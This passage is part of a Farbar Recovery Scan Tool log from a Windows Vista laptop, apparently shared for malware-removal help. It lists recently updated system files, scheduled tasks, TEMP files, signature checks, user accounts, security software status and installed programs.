11:58 - 2015-12-05 11:41 - 01539072 _____ (Microsoft Corporation) C:\Windows\system32\WMVSDECD.DLL 2016-01-17 11:58 - 2015-12-05 11:41 - 01350656 _____ (Microsoft Corporation) C:\Windows\system32\WMSPDMOE.DLL 2016-01-17 11:58 - 2015-12-05 11:41 - 01127424 _____ (Microsoft Corporation) C:\Windows\system32\WMADMOE.DLL 2016-01-17 11:58 - 2015-12-05 11:41 - 01090560 _____ (Microsoft Corporation) C:\Windows\system32\wmpmde.dll 2016-01-17 11:58 - 2015-12-05 11:41 - 00942592 _____ (Microsoft Corporation) C:\Windows\system32\WMADMOD.DLL 2016-01-17 11:58 - 2015-12-05 11:41 - 00819200 _____ (Microsoft Corporation) C:\Windows\system32\WMSPDMOD.DLL 2016-01-17 11:58 - 2015-12-05 11:41 - 00732160 _____ (Microsoft Corporation) C:\Windows\system32\WMVSENCD.DLL 2016-01-17 11:58 - 2015-12-05 11:41 - 00617984 _____ (Microsoft Corporation) C:\Windows\system32\WMVXENCD.DLL 2016-01-17 11:58 - 2015-12-05 11:40 - 03548672 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll 2016-01-17 11:58 - 2015-12-05 11:40 - 01571328 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll 2016-01-17 11:58 - 2015-12-05 11:40 - 00778752 _____ (Microsoft Corporation) C:\Windows\system32\MSMPEG2VDEC.DLL 2016-01-17 11:58 - 2015-12-05 11:40 - 00644608 _____ (Microsoft Corporation) C:\Windows\system32\MSMPEG2ENC.DLL 2016-01-17 11:58 - 2015-12-05 11:40 - 00620544 _____ (Microsoft Corporation) C:\Windows\system32\qedit.dll 2016-01-17 11:58 - 2015-12-05 11:40 - 00526336 _____ (Microsoft Corporation) C:\Windows\system32\MSMPEG2ADEC.DLL 2016-01-17 11:58 - 2015-12-05 11:40 - 00352256 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll 2016-01-17 11:58 - 2015-12-05 11:40 - 00309248 _____ (Microsoft Corporation) C:\Windows\system32\VIDRESZR.DLL 2016-01-17 11:58 - 2015-12-05 11:40 - 00301056 _____ (Microsoft Corporation) C:\Windows\system32\MP4SDECD.DLL 2016-01-17 11:58 - 2015-12-05 11:40 - 00252416 _____ (Microsoft Corporation) C:\Windows\system32\qasf.dll 2016-01-17 11:58 - 2015-12-05 11:40 - 00231936 _____ (Microsoft Corporation) C:\Windows\system32\MPG4DECD.DLL 2016-01-17 11:58 - 2015-12-05 11:40 - 00231936 _____ (Microsoft Corporation) C:\Windows\system32\MP43DECD.DLL 2016-01-17 11:58 - 2015-12-05 11:40 - 00223232 _____ (Microsoft Corporation) C:\Windows\system32\RESAMPLEDMO.DLL 2016-01-17 11:58 - 2015-12-05 11:40 - 00099328 _____ (Microsoft Corporation) C:\Windows\system32\MP3DMOD.DLL 2016-01-17 11:58 - 2015-12-05 11:39 - 01074176 _____ (Microsoft Corporation) C:\Windows\system32\mcmde.dll 2016-01-17 11:58 - 2015-12-05 11:39 - 00641024 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll 2016-01-17 11:58 - 2015-12-05 11:39 - 00471040 _____ (Microsoft Corporation) C:\Windows\system32\MFWMAAEC.DLL 2016-01-17 11:58 - 2015-12-05 11:39 - 00278016 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll 2016-01-17 11:58 - 2015-12-05 11:39 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\ksproxy.ax 2016-01-17 11:58 - 2015-12-05 11:39 - 00187392 _____ (Microsoft Corporation) C:\Windows\system32\COLORCNV.DLL 2016-01-17 11:58 - 2015-12-05 11:39 - 00074752 _____ (Microsoft Corporation) C:\Windows\system32\mfvdsp.dll 2016-01-17 11:58 - 2015-12-05 11:39 - 00073216 _____ (Microsoft Corporation) C:\Windows\system32\devenum.dll 2016-01-17 11:58 - 2015-12-05 11:22 - 00122368 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\drmk.sys 2016-01-17 11:57 - 2015-12-05 12:03 - 00304640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll 2016-01-17 11:57 - 2015-12-05 11:39 - 00390656 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll 2016-01-17 11:48 - 2015-12-30 11:47 - 04694464 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe 2016-01-16 08:53 - 2015-12-15 17:28 - 17892352 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll 2016-01-16 08:53 - 2015-12-15 17:25 - 02350080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll 2016-01-16 08:53 - 2015-12-15 17:21 - 10938368 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll 2016-01-16 08:53 - 2015-12-15 17:20 - 01388032 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll 2016-01-16 08:53 - 2015-12-15 17:20 - 00448512 _____ (Microsoft Corporation) C:\Windows\system32\html.iec 2016-01-16 08:53 - 2015-12-15 17:19 - 02158080 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll 2016-01-16 08:53 - 2015-12-15 17:19 - 01392128 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll 2016-01-16 08:53 - 2015-12-15 17:18 - 02382848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb 2016-01-16 08:53 - 2015-12-15 17:18 - 01494016 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl 2016-01-16 08:53 - 2015-12-15 17:18 - 00816128 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll 2016-01-16 08:53 - 2015-12-15 17:18 - 00729088 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll 2016-01-16 08:53 - 2015-12-15 17:18 - 00579584 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll 2016-01-16 08:53 - 2015-12-15 17:18 - 00453120 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll 2016-01-16 08:53 - 2015-12-15 17:18 - 00282112 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll 2016-01-16 08:53 - 2015-12-15 17:18 - 00248320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll 2016-01-16 08:53 - 2015-12-15 17:18 - 00237056 _____ (Microsoft Corporation) C:\Windows\system32\url.dll 2016-01-16 08:53 - 2015-12-15 17:18 - 00173568 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe 2016-01-16 08:53 - 2015-12-15 17:18 - 00096768 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll 2016-01-16 08:53 - 2015-12-15 17:18 - 00086016 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll 2016-01-16 08:53 - 2015-12-15 17:18 - 00055296 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll 2016-01-16 08:53 - 2015-12-15 17:18 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe 2016-01-16 08:53 - 2015-12-15 17:18 - 00011264 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe 2016-01-16 08:53 - 2015-12-15 16:50 - 01814528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll 2016-01-16 08:53 - 2015-12-15 16:49 - 12388864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll 2016-01-16 08:53 - 2015-12-15 16:47 - 00367616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec 2016-01-16 08:53 - 2015-12-15 16:46 - 09753088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll 2016-01-16 08:53 - 2015-12-15 16:45 - 01140224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll 2016-01-16 08:53 - 2015-12-15 16:45 - 01129472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll 2016-01-16 08:53 - 2015-12-15 16:44 - 01804800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll 2016-01-16 08:53 - 2015-12-15 16:44 - 01427968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl 2016-01-16 08:53 - 2015-12-15 16:44 - 00718848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll 2016-01-16 08:53 - 2015-12-15 16:44 - 00424960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll 2016-01-16 08:53 - 2015-12-15 16:44 - 00231936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\url.dll 2016-01-16 08:53 - 2015-12-15 16:44 - 00142848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe 2016-01-16 08:53 - 2015-12-15 16:44 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll 2016-01-16 08:53 - 2015-12-15 16:43 - 02382848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb 2016-01-16 08:53 - 2015-12-15 16:43 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll 2016-01-16 08:53 - 2015-12-15 16:43 - 00353792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll 2016-01-16 08:53 - 2015-12-15 16:43 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll 2016-01-16 08:53 - 2015-12-15 16:43 - 00176640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll 2016-01-16 08:53 - 2015-12-15 16:43 - 00073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll 2016-01-16 08:53 - 2015-12-15 16:43 - 00041472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedsbs.dll 2016-01-16 08:53 - 2015-12-15 16:43 - 00011776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshta.exe 2016-01-16 08:52 - 2015-12-15 16:43 - 00010752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedssync.exe 2016-01-16 08:08 - 2015-12-05 10:34 - 02799616 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys 2016-01-16 08:07 - 2015-11-13 11:56 - 00066560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mapistub.dll 2016-01-16 08:07 - 2015-11-13 11:56 - 00066560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mapi32.dll 2016-01-16 08:07 - 2015-11-13 11:42 - 00083456 _____ (Microsoft Corporation) C:\Windows\system32\mapistub.dll 2016-01-16 08:07 - 2015-11-13 11:42 - 00083456 _____ (Microsoft Corporation) C:\Windows\system32\mapi32.dll 2016-01-16 08:07 - 2015-11-13 10:27 - 00013824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fixmapi.exe 2016-01-15 14:36 - 2016-01-15 14:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee Security Scan Plus 2016-01-08 20:17 - 2016-01-16 07:56 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox ==================== One Month Modified files and folders ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2016-01-30 12:27 - 2014-11-19 20:20 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job 2016-01-30 12:27 - 2014-11-19 20:20 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job 2016-01-30 12:19 - 2015-01-19 10:44 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job 2016-01-30 12:15 - 2006-11-02 10:42 - 00000006 ____H C:\Windows\Tasks\SA.DAT 2016-01-30 12:15 - 2006-11-02 10:22 - 00003616 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0 2016-01-30 12:15 - 2006-11-02 10:22 - 00003616 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0 2016-01-29 17:57 - 2006-11-02 10:42 - 00032544 _____ C:\Windows\Tasks\SCHEDLGU.TXT 2016-01-27 03:15 - 2014-12-15 16:40 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\Yahoo! 2016-01-27 03:15 - 2014-12-15 16:39 - 00000000 ____D C:\Users\Barbara\AppData\LocalLow\Yahoo! 2016-01-27 03:15 - 2014-12-15 16:39 - 00000000 ____D C:\Program Files (x86)\Yahoo! 2016-01-26 03:07 - 2006-11-02 08:33 - 00000000 ____D C:\Windows 2016-01-26 03:04 - 2006-11-02 08:33 - 00000000 ____D C:\Windows\inf 2016-01-26 03:04 - 2006-11-02 07:46 - 00758862 _____ C:\Windows\system32\PerfStringBackup.INI 2016-01-23 18:06 - 2014-12-15 16:39 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\ContentExplorer 2016-01-23 14:01 - 2015-03-17 13:00 - 00000370 _____ C:\Windows\Tasks\SlimCleaner Plus (Scheduled Scan - Barbara).job 2016-01-21 12:18 - 2014-11-20 07:14 - 00001656 _____ C:\Windows\Tasks\wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A.job 2016-01-21 12:17 - 2014-11-20 07:14 - 00008002 _____ C:\Windows\System32\Tasks\wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A 2016-01-20 11:18 - 2015-01-19 10:44 - 00796864 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe 2016-01-20 11:18 - 2015-01-19 10:44 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl 2016-01-20 11:18 - 2015-01-19 10:44 - 00003682 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater 2016-01-17 12:54 - 2006-11-02 08:33 - 00000000 ____D C:\Windows\rescache 2016-01-17 12:34 - 2014-11-22 10:31 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight 2016-01-17 12:23 - 2014-11-18 01:10 - 00000000 ____D C:\Windows\SysWOW64\RTCOM 2016-01-17 12:06 - 2014-11-18 00:49 - 00000000 ____D C:\ProgramData\Microsoft Help 2016-01-17 12:05 - 2014-11-22 10:32 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight 2016-01-17 11:57 - 2014-11-18 20:12 - 00000000 ____D C:\Windows\system32\MRT 2016-01-17 11:50 - 2006-11-02 07:35 - 143671360 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe 2016-01-16 08:28 - 2006-11-02 10:21 - 00332240 _____ C:\Windows\system32\FNTCACHE.DAT 2016-01-16 07:56 - 2015-05-31 10:14 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service 2016-01-15 14:36 - 2015-11-20 18:46 - 00000000 ____D C:\Program Files\McAfee Security Scan 2016-01-01 18:32 - 2015-01-31 14:56 - 00000000 ____D C:\Users\Barbara\Desktop\Family Tree ==================== Files in the root of some directories ======= 2015-01-31 15:51 - 2015-07-22 17:07 - 0000240 _____ () C:\Users\Barbara\AppData\Roaming\wklnhst.dat 2014-11-18 18:24 - 2015-03-20 10:29 - 0000680 _____ () C:\Users\Barbara\AppData\Local\d3d9caps.dat 2014-12-15 16:46 - 2014-12-15 16:49 - 0004424 _____ () C:\Users\Barbara\AppData\Local\dd_vcredistMSI1954.txt 2014-12-15 16:46 - 2014-12-15 16:46 - 0016288 _____ () C:\Users\Barbara\AppData\Local\dd_vcredistUI1954.txt Some files in TEMP: ==================== C:\Users\Barbara\AppData\Local\Temp\exec.exe C:\Users\Barbara\AppData\Local\Temp\jre-8u31-windows-au.exe C:\Users\Barbara\AppData\Local\Temp\NullsoftHelper.dll C:\Users\Barbara\AppData\Local\Temp\sqlite3.dll C:\Users\Barbara\AppData\Local\Temp\uires.dll ==================== Bamital & volsnap ================= (There is no automatic fix for files that do not pass verification.) C:\Windows\system32\winlogon.exe => File is digitally signed C:\Windows\system32\wininit.exe => File is digitally signed C:\Windows\SysWOW64\wininit.exe => File is digitally signed C:\Windows\explorer.exe => File is digitally signed C:\Windows\SysWOW64\explorer.exe => File is digitally signed C:\Windows\system32\svchost.exe => File is digitally signed C:\Windows\SysWOW64\svchost.exe => File is digitally signed C:\Windows\system32\services.exe => File is digitally signed C:\Windows\system32\User32.dll => File is digitally signed C:\Windows\SysWOW64\User32.dll => File is digitally signed C:\Windows\system32\userinit.exe => File is digitally signed C:\Windows\SysWOW64\userinit.exe => File is digitally signed C:\Windows\system32\rpcss.dll => File is digitally signed C:\Windows\system32\dnsapi.dll => File is digitally signed C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2016-01-30 12:28 ==================== End of FRST.txt ============================ Additional scan result of Farbar Recovery Scan Tool (x64) Version:24-01-2016 Ran by Barbara (2016-01-30 12:36:06) Running from C:\Users\Barbara\Desktop Windows Vista Home Premium Service Pack 2 (X64) (2014-11-18 05:42:01) Boot Mode: Normal ========================================================== ==================== Accounts: ============================= Administrator (S-1-5-21-3355649212-3080085010-2879840853-500 - Administrator - Disabled) Barbara (S-1-5-21-3355649212-3080085010-2879840853-1000 - Administrator - Enabled) => C:\Users\Barbara Guest (S-1-5-21-3355649212-3080085010-2879840853-501 - Limited - Disabled) ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: Microsoft Security Essentials (Enabled - Out of date) {B7ECF8CD-0188-6703-DBA4-AA65C6ACFB0A} AV: Webroot AntiVirus with Spy Sweeper (Enabled - Out of date) {3A033352-45FD-579C-DF47-2D2DA7A56A3D} AS: Microsoft Security Essentials (Enabled - Out of date) {0C8D1929-27B2-688D-E114-9117BD2BB1B7} AS: Webroot AntiVirus with Spy Sweeper (Enabled - Out of date) {8162D2B6-63C7-5812-E5F7-165FDC222080} AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Installed Programs ====================== (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated) Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.0.7220 - Adobe Systems Inc.) Adobe Flash Player 20 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 20.0.0.286 - Adobe Systems Incorporated) Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.286 - Adobe Systems Incorporated) Adobe Reader 9.1 (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-A91000000001}) (Version: 9.1.0 - Adobe Systems Incorporated) Amazon Links (HKLM-x32\...\{224821ED-CADA-4A8A-AC8D-3734CC0F0931}) (Version: 1.0 - TOSHIBA Corporation) ATI Catalyst Install Manager (HKLM\...\{190A60F1-2FEE-0A11-7D37-D8607809CC39}) (Version: 3.0.723.0 - ATI Technologies, Inc.) Bing Bar (HKLM-x32\...\{449CE12D-E2C7-4B97-B19E-55D163EA9435}) (Version: 7.0.619.0 - Microsoft Corporation) ccc-core-static (x32 Version: 2009.0421.2132.36832 - ATI) Hidden Compatibility Pack for the 2007 Office system (HKLM-x32\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation) CyberLink PowerCinema for TOSHIBA (HKLM-x32\...\InstallShield_{2637C347-9DAD-11D6-9EA2-00055D0CA761}) (Version: 6.0.2616a - CyberLink Corp.) D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden Direct DiscRecorder (x32 Version: 1.00.0000 - Corel Corporation) Hidden Dolby Control Center (HKLM\...\{20387B45-18A4-4D48-ABD9-A23D2CBE42B3}) (Version: 2.2.1 - Dolby) DriverUpdate (HKLM-x32\...\{B2B04F8B-6444-4364-89C8-F3088D4E8D02}) (Version: 2.2.43335 - SlimWare Utilities, Inc.) DVD MovieFactory for TOSHIBA (HKLM-x32\...\InstallShield_{50F68032-B5B7-4513-9116-C978DBD8F27A}) (Version: 7.0.0 - Corel Corporation) DVD MovieFactory for TOSHIBA (x32 Version: 7.0.0 - Corel Corporation) Hidden Generations (HKLM-x32\...\{CB9EA6BB-B653-11D4-B6F6-00105A27284D}) (Version: - ) Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.7210.1528 - Google Inc.) Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) Hidden Intel® PROSet/Wireless WiFi Software (HKLM\...\{F22FD942-651D-4EE8-BD6F-7E0AF5E17625}) (Version: 12.04.0000 - Intel Corporation) Intel® Matrix Storage Manager (HKLM\...\{9068B2BE-D93A-4C0A-861C-5E35E2C0E09E}) (Version: - Intel Corporation) Java 8 Update 25 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218025F0}) (Version: 8.0.250 - Oracle Corporation) Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Lexmark 3400 Series (HKLM\...\Lexmark 3400 Series) (Version: - Lexmark International, Inc.) Lexmark Toolbar (HKLM-x32\...\{1017A80C-6F09-4548-A84D-EDD6AC9525F0}) (Version: - ) LightScribe 1.4.124.1 (x32 Version: 1.4.124.1 - hxxp://www.lightscribe.com) Hidden Malwarebytes Anti-Malware version 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes) McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.11.266.3 - McAfee, Inc.) McAfee Security Scan Plus (HKLM-x32\...\McAfee Security Scan) (Version: 3.11.163.2 - McAfee, Inc.) Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden Messenger Companion (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version: - Microsoft Corporation) Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation) Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version: - Microsoft) Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation) Microsoft Office Home and Student 2007 (HKLM-x32\...\HOMESTUDENTR) (Version: 12.0.6612.1000 - Microsoft Corporation) Microsoft Office PowerPoint Viewer 2007 (English) (HKLM-x32\...\{95120000-00AF-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation) Microsoft Office Suite Activation Assistant (HKLM-x32\...\{E50AE784-FABE-46DA-A1F8-7B6B56DCB22E}) (Version: 2.9 - Microsoft Corporation) Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.8.204.0 - Microsoft Corporation) Microsoft Silverlight (HKLM-x32\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation) Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Works (HKLM-x32\...\{15BC8CD0-A65B-47D0-A2DD-90A824590FA8}) (Version: 9.7.0621 - Microsoft Corporation) Mozilla Firefox 43.0.4 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 43.0.4 (x86 en-US)) (Version: 43.0.4 - Mozilla) Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 43.0.4.5848 - Mozilla) MSXML 4.0 SP2 (KB941833) (HKLM-x32\...\{C523D256-313D-4866-B36A-F3DE528246EF}) (Version: 4.20.9849.0 - Microsoft Corporation) MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation) MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation) MSXML 4.0 SP2 and SOAP Toolkit 3.0 (x32 Version: 1.0.0.0 - Webroot Software, Inc.) Hidden Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9 - Google, Inc.) PlayReady PC runtime (HKLM\...\{704ABF63-B0B1-446B-9D92-C5D06AFCE7B6}) (Version: 1 - Microsoft Corporation) QuickBooks Financial Center (HKLM-x32\...\{890EF3F8-742F-46BD-9E8E-084B3A1F4364}) (Version: 1.10.0000 - Intuit Inc.) Realtek 8136 8168 8169 Ethernet Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 1.00.0004 - Realtek) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5809 - Realtek Semiconductor Corp.) RICOH R5U230 Media Driver ver.2.02.02.01 (HKLM-x32\...\{022CBB38-CEF0-42BA-906A-A49BEFAE0BEE}) (Version: 2.02.02.01 - RICOH) Segoe UI (x32 Version: 15.4.2271.0615 - Microsoft Corp) Hidden Skins (x32 Version: 2009.0421.2132.36832 - ATI) Hidden Skype Launcher (HKLM-x32\...\{BF5A20B4-55F7-49B8-9302-FAC7C459AF3D}) (Version: 1.0 - TOSHIBA Corporation) Spy Sweeper Core (x32 Version: 4.4.0.85 - Webroot Software) Hidden Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 12.2.10.0 - Synaptics Incorporated) TOSHIBA Agreement Notification Utility (HKLM-x32\...\InstallShield_{83892653-9EB8-4192-803E-D987A85CDD23}) (Version: 1.0.11.0 - TOSHIBA Corporation) Toshiba Application Installer (HKLM-x32\...\{970472D0-F5F9-4158-A6E3-1AE49EFEF2D3}) (Version: 9.0.0.4 - Toshiba) TOSHIBA Assist (HKLM-x32\...\{1B87C40B-A60B-4EF3-9A68-706CF4B69978}) (Version: 3.00.08 - TOSHIBA) TOSHIBA ConfigFree (HKLM-x32\...\{F0A386D2-6E15-4A8F-A04E-87CE9BED0D48}) (Version: 7.4.8 - TOSHIBA Corporation) TOSHIBA Disc Creator (HKLM\...\{5DA0E02F-970B-424B-BF41-513A5018E4C0}) (Version: 2.0.1.3 for x64 - TOSHIBA Corporation) TOSHIBA DVD PLAYER (HKLM-x32\...\{6C5F3BDC-0A1B-4436-A696-5939629D5C31}) (Version: 3.00.1.04-A - TOSHIBA Corporation) TOSHIBA eco Utility (HKLM-x32\...\InstallShield_{B3FF1CD9-B2F0-4D71-BB55-5F580401C48E}) (Version: 1.0.2.64 - TOSHIBA Corporation) TOSHIBA Extended Tiles for Windows Mobility Center (HKLM-x32\...\InstallShield_{617C36FD-0CBE-4600-84B2-441CEB12FADF}) (Version: - ) TOSHIBA Face Recognition (HKLM-x32\...\InstallShield_{F67FA545-D8E5-4209-86B1-AEE045D1003F}) (Version: 3.0.4.64 - TOSHIBA Corporation) TOSHIBA Hardware Setup (HKLM-x32\...\{D0387727-C89D-4774-B643-B9333EAA09DE}) (Version: 2.00.03 - TOSHIBA Corporation) TOSHIBA HDD Protection (HKLM\...\{94A90C69-71C1-470A-88F5-AA47ECC96B40}) (Version: 2.1.2.9 - TOSHIBA Corporation) TOSHIBA HDD/SSD Alert (HKLM-x32\...\InstallShield_{D4322448-B6AF-4316-B859-D8A0E84DCB38}) (Version: 3.0.64.0 - TOSHIBA Corporation) TOSHIBA Internal Modem Region Select Utility (HKLM-x32\...\InstallShield_{89F7D66C-777D-473B-AA11-319C0F190EAC}) (Version: - ) Toshiba Quality Application (HKLM-x32\...\{E69992ED-A7F6-406C-9280-1C156417BC49}) (Version: 1.001.0000 - Toshiba) TOSHIBA Recovery Disc Creator (HKLM\...\{B65BBB06-1F8E-48F5-8A54-B024A9E15FDF}) (Version: 2.0.0.2 for x64 - TOSHIBA Corporation) Toshiba Registration (HKLM-x32\...\{C53D16CC-E56F-47B8-906E-70AAF8EABB4F}) (Version: 1.00.0000 - Datalode Inc.) Toshiba Resources Page (HKLM-x32\...\{21526716-DFD8-4B90-86D9-EF9F47057B3E}) (Version: 1.0.2.1 - TOSHIBA Corporation) TOSHIBA SD Memory Utilities (HKLM\...\{EBFF48F5-3CFA-436F-8FD5-94FB01D3A0A7}) (Version: 1.9.1.12 - TOSHIBA) TOSHIBA Software Modem (HKLM\...\TOSHIBA Software Modem) (Version: - Agere Systems) TOSHIBA Speech System Applications (HKLM-x32\...\{EE033C1F-443E-41EC-A0E2-559B539A4E4D}) (Version: - ) TOSHIBA Speech System SR Engine(U.S.) Version1.0 (HKLM-x32\...\{008D69EB-70FF-46AB-9C75-924620DF191A}) (Version: - ) TOSHIBA Speech System TTS Engine(U.S.) Version1.0 (HKLM-x32\...\{3FBF6F99-8EC6-41B4-8527-0A32241B5496}) (Version: - 